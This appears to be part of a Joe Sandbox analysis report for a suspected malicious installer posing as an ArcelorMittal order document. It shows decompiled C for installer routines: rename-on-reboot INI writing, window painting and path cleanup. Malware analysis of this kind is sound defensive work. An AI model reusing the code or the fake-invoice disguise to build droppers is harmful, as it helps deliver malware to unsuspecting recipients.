                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                              • String ID: N$open$iz
                                                              • API String ID: 3615053054-3184408566
                                                              • Opcode ID: 01da6d32b2a417ec90abe3a2877bb8b4f20cf3725a55cc12a2a61828b7308d80
                                                              • Instruction ID: f5fa6e7357a1776686f67c5c85bccc632f1e4afc8f648020f62b4c2f23f21bc2
                                                              • Opcode Fuzzy Hash: 01da6d32b2a417ec90abe3a2877bb8b4f20cf3725a55cc12a2a61828b7308d80
                                                              • Instruction Fuzzy Hash: CA7181B1900609BFDB109F60DD85E6A7B79FB84744F04853AF705B61E0CB789951CFA8
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00405D61(void* __ecx) {
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				long _t13;
                                                              				long _t25;
                                                              				char* _t32;
                                                              				int _t38;
                                                              				void* _t39;
                                                              				intOrPtr* _t40;
                                                              				long _t43;
                                                              				WCHAR* _t45;
                                                              				void* _t47;
                                                              				void* _t49;
                                                              				void* _t50;
                                                              				void* _t53;
                                                              				void* _t54;
                                                              
                                                              				_t39 = __ecx;
                                                              				lstrcpyW(0x7a55e0, L"NUL");
                                                              				_t45 =  *(_t53 + 0x18);
                                                              				if(_t45 == 0) {
                                                              					L3:
                                                              					_t2 = _t53 + 0x1c; // 0x7a5de0
                                                              					_t13 = GetShortPathNameW( *_t2, 0x7a5de0, 0x400);
                                                              					if(_t13 != 0 && _t13 <= 0x400) {
                                                              						_t38 = wsprintfA(0x7a51e0, "%ls=%ls\r\n", 0x7a55e0, 0x7a5de0);
                                                              						_t54 = _t53 + 0x10;
                                                              						E00406054(_t38, 0x400, 0x7a5de0, 0x7a5de0,  *((intOrPtr*)( *0x7a8a50 + 0x128)));
                                                              						_t13 = E00405C07(0x7a5de0, 0xc0000000, 4);
                                                              						_t49 = _t13;
                                                              						 *(_t54 + 0x18) = _t49;
                                                              						if(_t49 != 0xffffffff) {
                                                              							_t43 = GetFileSize(_t49, 0);
                                                              							_t6 = _t38 + 0xa; // 0xa
                                                              							_t47 = GlobalAlloc(0x40, _t43 + _t6);
                                                              							if(_t47 == 0 || E00405C8A(_t49, _t47, _t43) == 0) {
                                                              								L18:
                                                              								return CloseHandle(_t49);
                                                              							} else {
                                                              								if(E00405B6C(_t39, _t47, "[Rename]\r\n") != 0) {
                                                              									_t50 = E00405B6C(_t39, _t22 + 0xa, "\n[");
                                                              									if(_t50 == 0) {
                                                              										_t49 =  *(_t54 + 0x18);
                                                              										L16:
                                                              										_t25 = _t43;
                                                              										L17:
                                                              										E00405BC2(_t25 + _t47, 0x7a51e0, _t38);
                                                              										SetFilePointer(_t49, 0, 0, 0);
                                                              										E00405CB9(_t49, _t47, _t43 + _t38);
                                                              										GlobalFree(_t47);
                                                              										goto L18;
                                                              									}
                                                              									_t40 = _t47 + _t43;
                                                              									_t32 = _t40 + _t38;
                                                              									while(_t40 > _t50) {
                                                              										 *_t32 =  *_t40;
                                                              										_t32 = _t32 - 1;
                                                              										_t40 = _t40 - 1;
                                                              									}
                                                              									_t25 = _t50 - _t47 + 1;
                                                              									_t49 =  *(_t54 + 0x18);
                                                              									goto L17;
                                                              								}
                                                              								lstrcpyA(_t47 + _t43, "[Rename]\r\n");
                                                              								_t43 = _t43 + 0xa;
                                                              								goto L16;
                                                              							}
                                                              						}
                                                              					}
                                                              				} else {
                                                              					CloseHandle(E00405C07(_t45, 0, 1));
                                                              					_t13 = GetShortPathNameW(_t45, 0x7a55e0, 0x400);
                                                              					if(_t13 != 0 && _t13 <= 0x400) {
                                                              						goto L3;
                                                              					}
                                                              				}
                                                              				return _t13;
                                                              			}



















                                                              0x00405d61
                                                              0x00405d70
                                                              0x00405d76
                                                              0x00405d87
                                                              0x00405daf
                                                              0x00405db6
                                                              0x00405dba
                                                              0x00405dbe
                                                              0x00405dde
                                                              0x00405de5
                                                              0x00405def
                                                              0x00405dfc
                                                              0x00405e01
                                                              0x00405e06
                                                              0x00405e0a
                                                              0x00405e19
                                                              0x00405e1b
                                                              0x00405e28
                                                              0x00405e2c
                                                              0x00405ec7
                                                              0x00000000
                                                              0x00405e42
                                                              0x00405e4f
                                                              0x00405e73
                                                              0x00405e77
                                                              0x00405e96
                                                              0x00405e9a
                                                              0x00405e9a
                                                              0x00405e9c
                                                              0x00405ea5
                                                              0x00405eb0
                                                              0x00405ebb
                                                              0x00405ec1
                                                              0x00000000
                                                              0x00405ec1
                                                              0x00405e79
                                                              0x00405e7c
                                                              0x00405e87
                                                              0x00405e83
                                                              0x00405e85
                                                              0x00405e86
                                                              0x00405e86
                                                              0x00405e8e
                                                              0x00405e90
                                                              0x00000000
                                                              0x00405e90
                                                              0x00405e5a
                                                              0x00405e60
                                                              0x00000000
                                                              0x00405e60
                                                              0x00405e2c
                                                              0x00405e0a
                                                              0x00405d89
                                                              0x00405d94
                                                              0x00405d9d
                                                              0x00405da1
                                                              0x00000000
                                                              0x00000000
                                                              0x00405da1
                                                              0x00405ed2

                                                              APIs
                                                              • lstrcpyW.KERNEL32(007A55E0,NUL), ref: 00405D70
                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,0040A300,00405EF4,?,?), ref: 00405D94
                                                              • GetShortPathNameW.KERNEL32(?,007A55E0,00000400), ref: 00405D9D
                                                                • Part of subcall function 00405B6C: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E4D,00000000,[Rename],00000000,00000000,00000000), ref: 00405B7C
                                                                • Part of subcall function 00405B6C: lstrlenA.KERNEL32(00000000,?,00000000,00405E4D,00000000,[Rename],00000000,00000000,00000000), ref: 00405BAE
                                                              • GetShortPathNameW.KERNEL32(]z,007A5DE0,00000400), ref: 00405DBA
                                                              • wsprintfA.USER32 ref: 00405DD8
                                                              • GetFileSize.KERNEL32(00000000,00000000,007A5DE0,C0000000,00000004,007A5DE0,?), ref: 00405E13
                                                              • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405E22
                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405E5A
                                                              • SetFilePointer.KERNEL32(0040A578,00000000,00000000,00000000,00000000,007A51E0,00000000,-0000000A,0040A578,00000000,[Rename],00000000,00000000,00000000), ref: 00405EB0
                                                              • GlobalFree.KERNEL32(00000000), ref: 00405EC1
                                                              • CloseHandle.KERNEL32(00000000), ref: 00405EC8
                                                                • Part of subcall function 00405C07: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe,80000000,00000003,?,?,00000000,00403517,?), ref: 00405C0B
                                                                • Part of subcall function 00405C07: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,00403517,?), ref: 00405C2D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                              • String ID: %ls=%ls$NUL$[Rename]$Uz$]z$]z
                                                              • API String ID: 222337774-2882615421
                                                              • Opcode ID: 96167ce44ddedef176c8bff3fbbd2245610190e2ff8f9a1c8bc4a62397111b78
                                                              • Instruction ID: 75cee4360bd3bcd07888cd864a4516e3a0162a31efabfd5f0f4b5e85420b189e
                                                              • Opcode Fuzzy Hash: 96167ce44ddedef176c8bff3fbbd2245610190e2ff8f9a1c8bc4a62397111b78
                                                              • Instruction Fuzzy Hash: 6C31F370600B14BBD2216B219D49F6B3E6CDF45755F14043AFA81F62D2DA3CEA018EAD
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 90%
                                                              			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                              				struct tagLOGBRUSH _v16;
                                                              				struct tagRECT _v32;
                                                              				struct tagPAINTSTRUCT _v96;
                                                              				struct HDC__* _t70;
                                                              				struct HBRUSH__* _t87;
                                                              				struct HFONT__* _t94;
                                                              				long _t102;
                                                              				signed int _t126;
                                                              				struct HDC__* _t128;
                                                              				intOrPtr _t130;
                                                              
                                                              				if(_a8 == 0xf) {
                                                              					_t130 =  *0x7a8a50;
                                                              					_t70 = BeginPaint(_a4,  &_v96);
                                                              					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                              					_a8 = _t70;
                                                              					GetClientRect(_a4,  &_v32);
                                                              					_t126 = _v32.bottom;
                                                              					_v32.bottom = _v32.bottom & 0x00000000;
                                                              					while(_v32.top < _t126) {
                                                              						_a12 = _t126 - _v32.top;
                                                              						asm("cdq");
                                                              						asm("cdq");
                                                              						asm("cdq");
                                                              						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                              						_t87 = CreateBrushIndirect( &_v16);
                                                              						_v32.bottom = _v32.bottom + 4;
                                                              						_a16 = _t87;
                                                              						FillRect(_a8,  &_v32, _t87);
                                                              						DeleteObject(_a16);
                                                              						_v32.top = _v32.top + 4;
                                                              					}
                                                              					if( *(_t130 + 0x58) != 0xffffffff) {
                                                              						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                                                              						_a16 = _t94;
                                                              						if(_t94 != 0) {
                                                              							_t128 = _a8;
                                                              							_v32.left = 0x10;
                                                              							_v32.top = 8;
                                                              							SetBkMode(_t128, 1);
                                                              							SetTextColor(_t128,  *(_t130 + 0x58));
                                                              							_a8 = SelectObject(_t128, _a16);
                                                              							DrawTextW(_t128, "Overcaustically Setup", 0xffffffff,  &_v32, 0x820);
                                                              							SelectObject(_t128, _a8);
                                                              							DeleteObject(_a16);
                                                              						}
                                                              					}
                                                              					EndPaint(_a4,  &_v96);
                                                              					return 0;
                                                              				}
                                                              				_t102 = _a16;
                                                              				if(_a8 == 0x46) {
                                                              					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                              					 *((intOrPtr*)(_t102 + 4)) =  *0x7a8a48;
                                                              				}
                                                              				return DefWindowProcW(_a4, _a8, _a12, _t102);
                                                              			}













                                                              0x0040100a
                                                              0x00401039
                                                              0x00401047
                                                              0x0040104d
                                                              0x00401051
                                                              0x0040105b
                                                              0x00401061
                                                              0x00401064
                                                              0x004010f3
                                                              0x00401089
                                                              0x0040108c
                                                              0x004010a6
                                                              0x004010bd
                                                              0x004010cc
                                                              0x004010cf
                                                              0x004010d5
                                                              0x004010d9
                                                              0x004010e4
                                                              0x004010ed
                                                              0x004010ef
                                                              0x004010ef
                                                              0x00401100
                                                              0x00401105
                                                              0x0040110d
                                                              0x00401110
                                                              0x00401112
                                                              0x00401118
                                                              0x0040111f
                                                              0x00401126
                                                              0x00401130
                                                              0x00401142
                                                              0x00401156
                                                              0x00401160
                                                              0x00401165
                                                              0x00401165
                                                              0x00401110
                                                              0x0040116e
                                                              0x00000000
                                                              0x00401178
                                                              0x00401010
                                                              0x00401013
                                                              0x00401015
                                                              0x0040101f
                                                              0x0040101f
                                                              0x00000000

                                                              APIs
                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                              • DrawTextW.USER32(00000000,Overcaustically Setup,000000FF,00000010,00000820), ref: 00401156
                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                              • String ID: F$Overcaustically Setup
                                                              • API String ID: 941294808-1772504776
                                                              • Opcode ID: ce6bfb0b893aacce883330537bc8e63ee4883ce97208896732d7138368f4d8d8
                                                              • Instruction ID: de39ae593db74bf8e739f7026f96e360392c145d264594217dd326fc860e90c0
                                                              • Opcode Fuzzy Hash: ce6bfb0b893aacce883330537bc8e63ee4883ce97208896732d7138368f4d8d8
                                                              • Instruction Fuzzy Hash: E2418C71800209AFCF058F95DE459AFBBB9FF45310F00842EF991AA1A0CB38DA54DFA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 91%
                                                              			E004062C6(WCHAR* _a4) {
                                                              				short _t5;
                                                              				short _t7;
                                                              				WCHAR* _t19;
                                                              				WCHAR* _t20;
                                                              				WCHAR* _t21;
                                                              
                                                              				_t20 = _a4;
                                                              				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                                                              					_t20 =  &(_t20[4]);
                                                              				}
                                                              				if( *_t20 != 0 && E00405A5D(_t20) != 0) {
                                                              					_t20 =  &(_t20[2]);
                                                              				}
                                                              				_t5 =  *_t20;
                                                              				_t21 = _t20;
                                                              				_t19 = _t20;
                                                              				if(_t5 != 0) {
                                                              					do {
                                                              						if(_t5 > 0x1f &&  *((short*)(E00405A13(L"*?|<>/\":", _t5))) == 0) {
                                                              							E00405BC2(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                                                              							_t19 = CharNextW(_t19);
                                                              						}
                                                              						_t20 = CharNextW(_t20);
                                                              						_t5 =  *_t20;
                                                              					} while (_t5 != 0);
                                                              				}
                                                              				 *_t19 =  *_t19 & 0x00000000;
                                                              				while(1) {
                                                              					_push(_t19);
                                                              					_push(_t21);
                                                              					_t19 = CharPrevW();
                                                              					_t7 =  *_t19;
                                                              					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                              						break;
                                                              					}
                                                              					 *_t19 =  *_t19 & 0x00000000;
                                                              					if(_t21 < _t19) {
                                                              						continue;
                                                              					}
                                                              					break;
                                                              				}
                                                              				return _t7;
                                                              			}








                                                              0x004062c8
                                                              0x004062d1
                                                              0x004062e8
                                                              0x004062e8
                                                              0x004062ef
                                                              0x004062fb
                                                              0x004062fb
                                                              0x004062fe
                                                              0x00406301
                                                              0x00406306
                                                              0x00406308
                                                              0x00406311
                                                              0x00406315
                                                              0x00406332
                                                              0x0040633a
                                                              0x0040633a
                                                              0x0040633f
                                                              0x00406341
                                                              0x00406344
                                                              0x00406349
                                                              0x0040634a
                                                              0x0040634e
                                                              0x0040634e
                                                              0x0040634f
                                                              0x00406356
                                                              0x00406358
                                                              0x0040635f
                                                              0x00000000
                                                              0x00000000
                                                              0x00406367
                                                              0x0040636d
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040636d
                                                              0x00406372

                                                              APIs
                                                              • CharNextW.USER32(0040A300,*?|<>/":,00000000,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe",762E3420,C:\Users\user\AppData\Local\Temp\,00000000,00403258,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034A9), ref: 00406329
                                                              • CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 00406338
                                                              • CharNextW.USER32(0040A300,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe",762E3420,C:\Users\user\AppData\Local\Temp\,00000000,00403258,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034A9), ref: 0040633D
                                                              • CharPrevW.USER32(0040A300,0040A300,762E3420,C:\Users\user\AppData\Local\Temp\,00000000,00403258,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034A9), ref: 00406350
                                                              Strings
                                                              • *?|<>/":, xrefs: 00406318
                                                              • "C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe", xrefs: 0040630A
                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004062C7
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: Char$Next$Prev
                                                              • String ID: "C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                              • API String ID: 589700163-413170847
                                                              • Opcode ID: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                              • Instruction ID: d4b317f752b3f13875bb624486170839a033bb9266efc580798c69349bd43794
                                                              • Opcode Fuzzy Hash: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                              • Instruction Fuzzy Hash: 4611041580061295DB307B148D40AB7A2B8FF95754F42803FED86732C0E77C9CA286ED
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0040415D(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                              				struct tagLOGBRUSH _v16;
                                                              				long _t35;
                                                              				long _t37;
                                                              				void* _t40;
                                                              				long* _t49;
                                                              
                                                              				if(_a4 + 0xfffffecd > 5) {
                                                              					L15:
                                                              					return 0;
                                                              				}
                                                              				_t49 = GetWindowLongW(_a12, 0xffffffeb);
                                                              				if(_t49 == 0) {
                                                              					goto L15;
                                                              				}
                                                              				_t35 =  *_t49;
                                                              				if((_t49[5] & 0x00000002) != 0) {
                                                              					_t35 = GetSysColor(_t35);
                                                              				}
                                                              				if((_t49[5] & 0x00000001) != 0) {
                                                              					SetTextColor(_a8, _t35);
                                                              				}
                                                              				SetBkMode(_a8, _t49[4]);
                                                              				_t37 = _t49[1];
                                                              				_v16.lbColor = _t37;
                                                              				if((_t49[5] & 0x00000008) != 0) {
                                                              					_t37 = GetSysColor(_t37);
                                                              					_v16.lbColor = _t37;
                                                              				}
                                                              				if((_t49[5] & 0x00000004) != 0) {
                                                              					SetBkColor(_a8, _t37);
                                                              				}
                                                              				if((_t49[5] & 0x00000010) != 0) {
                                                              					_v16.lbStyle = _t49[2];
                                                              					_t40 = _t49[3];
                                                              					if(_t40 != 0) {
                                                              						DeleteObject(_t40);
                                                              					}
                                                              					_t49[3] = CreateBrushIndirect( &_v16);
                                                              				}
                                                              				return _t49[3];
                                                              			}








                                                              0x0040416f
                                                              0x00404203
                                                              0x00000000
                                                              0x00404203
                                                              0x00404180
                                                              0x00404184
                                                              0x00000000
                                                              0x00000000
                                                              0x0040418a
                                                              0x00404193
                                                              0x00404196
                                                              0x00404196
                                                              0x0040419c
                                                              0x004041a2
                                                              0x004041a2
                                                              0x004041ae
                                                              0x004041b4
                                                              0x004041bb
                                                              0x004041be
                                                              0x004041c1
                                                              0x004041c3
                                                              0x004041c3
                                                              0x004041cb
                                                              0x004041d1
                                                              0x004041d1
                                                              0x004041db
                                                              0x004041e0
                                                              0x004041e3
                                                              0x004041e8
                                                              0x004041eb
                                                              0x004041eb
                                                              0x004041fb
                                                              0x004041fb
                                                              0x00000000

                                                              APIs
                                                              • GetWindowLongW.USER32(?,000000EB), ref: 0040417A
                                                              • GetSysColor.USER32(00000000), ref: 00404196
                                                              • SetTextColor.GDI32(?,00000000), ref: 004041A2
                                                              • SetBkMode.GDI32(?,?), ref: 004041AE
                                                              • GetSysColor.USER32(?), ref: 004041C1
                                                              • SetBkColor.GDI32(?,?), ref: 004041D1
                                                              • DeleteObject.GDI32(?), ref: 004041EB
                                                              • CreateBrushIndirect.GDI32(?), ref: 004041F5
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                              • String ID:
                                                              • API String ID: 2320649405-0
                                                              • Opcode ID: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                              • Instruction ID: 369debbde0f7a754f16ab48c9af260ce6490938065ace01aa15cf7b70dd2699c
                                                              • Opcode Fuzzy Hash: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                              • Instruction Fuzzy Hash: 5F218EB1500704ABCB219F68DE08B5BBBF8AF41710F04892DF996E66A0C734E948CB64
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00404A5B(struct HWND__* _a4, intOrPtr _a8) {
                                                              				long _v8;
                                                              				signed char _v12;
                                                              				unsigned int _v16;
                                                              				void* _v20;
                                                              				intOrPtr _v24;
                                                              				long _v56;
                                                              				void* _v60;
                                                              				long _t15;
                                                              				unsigned int _t19;
                                                              				signed int _t25;
                                                              				struct HWND__* _t28;
                                                              
                                                              				_t28 = _a4;
                                                              				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                                                              				if(_a8 == 0) {
                                                              					L4:
                                                              					_v56 = _t15;
                                                              					_v60 = 4;
                                                              					SendMessageW(_t28, 0x113e, 0,  &_v60);
                                                              					return _v24;
                                                              				}
                                                              				_t19 = GetMessagePos();
                                                              				_v16 = _t19 >> 0x10;
                                                              				_v20 = _t19;
                                                              				ScreenToClient(_t28,  &_v20);
                                                              				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                                                              				if((_v12 & 0x00000066) != 0) {
                                                              					_t15 = _v8;
                                                              					goto L4;
                                                              				}
                                                              				return _t25 | 0xffffffff;
                                                              			}














                                                              0x00404a69
                                                              0x00404a76
                                                              0x00404a7c
                                                              0x00404aba
                                                              0x00404aba
                                                              0x00404ac9
                                                              0x00404ad0
                                                              0x00000000
                                                              0x00404ad2
                                                              0x00404a7e
                                                              0x00404a8d
                                                              0x00404a95
                                                              0x00404a98
                                                              0x00404aaa
                                                              0x00404ab0
                                                              0x00404ab7
                                                              0x00000000
                                                              0x00404ab7
                                                              0x00000000

                                                              APIs
                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A76
                                                              • GetMessagePos.USER32 ref: 00404A7E
